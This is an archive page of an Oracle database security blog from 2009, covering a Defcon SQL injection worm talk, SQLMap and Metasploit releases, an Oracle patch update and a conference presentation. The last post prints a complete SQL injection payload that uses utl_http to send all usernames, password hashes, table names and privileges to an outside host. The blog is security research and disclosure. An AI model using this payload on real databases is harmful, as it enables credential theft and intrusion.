Sie befinden sich in den Archiven der Kategorie SQL Injection.
| M | D | M | D | F | S | S |
|---|---|---|---|---|---|---|
| « Mrz | ||||||
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 | |||
- 11g (12)
- Allgemein (29)
- David Litchfield (7)
- Exploit (23)
- Forensics (7)
- Oracle Security (106)
- passwords (8)
- Repscan (1)
- Security (23)
- Sentrigo (5)
- software (9)
- source code audit (5)
- SQL Injection (24)
- Tools (24)
- Trainings (3)
- Tutorial (2)
- 9 Mrz 2012: 2 Cebit 2012 Presentations about Database Security
- 18 Nov 2011: DOAG 2011 Presentation "Best of Oracle Security 2011"
- 15 Okt 2011: Oracle Critical Patch Update Pre-Release Announcement - October 2011
- 17 Sep 2011: Disable Auditing and running OS commands using oradebug
- 13 Apr 2011: Blackhat Training "HACKING AND SECURING ORACLE (2 days) "
- 2 Apr 2011: Oracle Database 11.2 Express Edition Beta comes with weak default password
- 23 Mrz 2011: McAfee acquires Sentrigo
- 12 Okt 2010: TDE decrypt utilities and TDE/Password flash demo
- 22 Sep 2010: Marcell published "Writing your own password cracker" presentation
- 21 Sep 2010: Laszlo's presentation "Oracle Post Exploitation Techniques" and Marcel's Sybase ASE Password Cracker
Oracle Security
SQL Injection
- März 2012
- November 2011
- Oktober 2011
- September 2011
- April 2011
- März 2011
- Oktober 2010
- September 2010
- August 2010
- April 2010
- März 2010
- Februar 2010
- Januar 2010
- Dezember 2009
- November 2009
- Oktober 2009
- September 2009
- August 2009
- Juli 2009
- Mai 2009
- April 2009
- März 2009
- Februar 2009
- Januar 2009
- Dezember 2008
- November 2008
- Oktober 2008
- August 2008
- Juli 2008
- Mai 2008
- April 2008
- März 2008
- Februar 2008
- Januar 2008
- Dezember 2007
- November 2007
- Oktober 2007
- September 2007
- August 2007
- Juli 2007
- Juni 2007
- Mai 2007
Archiv der Kategorie SQL Injection
Defcon Presentation about an Oracle Worm, oap_hacker and bsqlbf
5 Aug 2009 von Alexander Kornbrust.
Sumit Siddharth has published his Defcon presentation about “The Making of Second SQL Injection Worm (Oracle Edition)“.
Sumit describes the differences between SQL Injection and PL/SQL Injection and presents his tool “oap_hacker.pl” which allows to run OS commands via Java. oap_hacker.pl and Bsqlbf v.2.3 are using a PL/SQL Injection bug in dbms_export_extension (the old one and not the new one which was fixed with the CPU July 2009).
BTW, the (underground) tool darkORASQLi.py to dump data from Oracle databases is also using the dbms_export_extension vulnerability to run OS command.
A demo of his Oracle worm ora_w0rm.pl is available on YouTube.
Here are some screenshots how to overtake a client PC accessing an (via worm) infected Oracle System:
Very interesting work. Thanks Sumit for this presentation.
Geschrieben in Exploit, SQL Injection, Oracle Security | Drucken | 1 Kommentar »
Oracle & Metasploit Presentation from Blackhat USA are already online
29 Jul 2009 von Alexander Kornbrust.
The Oracle & Metasploit material (PDF, Slides) from the Blackhat 2009 conference from Chris Gates is already online. A short review will be done tomorrow.
Geschrieben in Tools, SQL Injection, Security | Drucken | Keine Kommentare »
SQLMap 0.7-1 released
26 Jul 2009 von Alexander Kornbrust.
Bernardo Damele has released a new version of his SQL Injection Tool SQLMap 0.7.1. This version comes with new features like support for Mac OSX, support of Metasploit wrapping functions plus several bugfixes (changelog).
Geschrieben in SQL Injection, software | Drucken | Keine Kommentare »
Oracle CPU July 2009 published
15 Jul 2009 von Alexander Kornbrust.
Yesterday night Oracle released the July 2009 CPU. This CPU contains 30 fixes for several Oracle products. 10 security issues are fixed in the Oracle Database Server.As always the usual suspects (Esteban, David, Joxean, Alexandr, Dennis) and a few others reported issues in Oracle products.
The 3 most critical bugs this time are related to the TNS Listener and one of the bugs be exploited without authentication.These issues CVE-2009-1020, CVE-2009-1019, CVE-2009-1963 are rated with CVSS 9 (for Windows), 7.5 for Unix.
Oracle has also fixed 3 of my findings in the database (3 out of 10 :-))
- SQL Injection in DBMS_EXPORT_EXTENSION (previously fixed in April 2006)
- Information Disclosure (Password Hash) in Database Vault
- Information Disclosure (Password Hash) in Audit Vault
More details will be published within the next few days. The updates for our Oracle database scanner Repscan (free trial available) will be released within the next 2 days.
Geschrieben in SQL Injection, Security, Allgemein | Drucken | 1 Kommentar »
Presentation from Confidence 2009 available
16 Mai 2009 von Alexander Kornbrust.
I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.
http://victim.com/order.jsp?id=17‘ or 1=((select
sum(length(utl_http.request(’http://www.orasploit.com/’||
username||’='||password) from dba_users)))+((select
sum(utl_http.request(’http://www. orasploit.com/’||
owner||’='||table_name) from dba_tables))+((select
sum(length(utl_http.request(’http://www.orasploit.com/’||
owner||’='||table_name||’='||column_name)) from dba_users))
+((select sum(length(utl_http.request(’http://
www.orasploit.com/’||grantee||’='||granted_role) from
dba_role_privs)))+((select
sum(length(utl_http.request(’http://www.orasploit.com/’||
grantee||’='||owner||’='||table_name||’='||privilege||’='||
grantable) from dba_tab_privs)))–
Geschrieben in SQL Injection, Security, Allgemein | Drucken | 1 Kommentar »



